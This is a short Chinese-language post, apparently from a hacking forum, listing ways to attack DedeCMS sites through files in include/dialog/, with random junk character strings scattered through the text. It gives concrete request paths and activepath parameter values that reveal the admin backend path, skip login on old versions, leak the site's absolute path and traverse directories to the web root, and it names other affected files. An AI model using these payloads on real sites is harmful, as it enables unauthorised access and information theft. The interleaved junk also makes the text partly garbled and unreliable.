1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
; S8 o3 W8 ?$ @( n, Y: Q6 W+ I7 ~+ o
+ g! b, P% [9 w1 C2 ~员帐号,新版本的就直接转向了后台.
% P/ [# m3 i( @& I+ p
' l1 o/ |/ \/ O, ^/ ^! q2.include/dialog/config.php会爆出后台管理路径% [% q6 ?; {; w3 A. V6 E% l! b
# v' d0 A. Z& d- i. ~6 P3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录( p/ T! U `8 Y5 `" \4 D( |
4 @3 L4 [+ W4 w* {4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
! O0 `8 S1 f9 p1 h: Y! N; D
" ^# M5 O& e) R+ x; g! C* ~5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉. q; ]' v' \3 `$ f# B: t5 }
+ U1 h+ X5 V* H5 Q/ T$ R
到根目录去.不过这些版本的访问地址有些不同.
' s4 p6 \) r5 A地址为require/dialog/select_soft.php?activepath=/././././././././
, Q% S/ H: R' H. J: K3 ?0 m6 s/ n0 _# H/ J; D, c2 ~9 d( M
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦... J8 g- d! Q* @( a
存在相同问题的文件还有
7 q- @$ H) F i7 qinclude\dialog\select_images.php7 }4 T" Q T" v @) z+ B
include\dialog\select_media.php+ G @) l" |$ ~( R# \
include\dialog\select_templets.php
( K! J! H8 a. C. S: \, U0 f |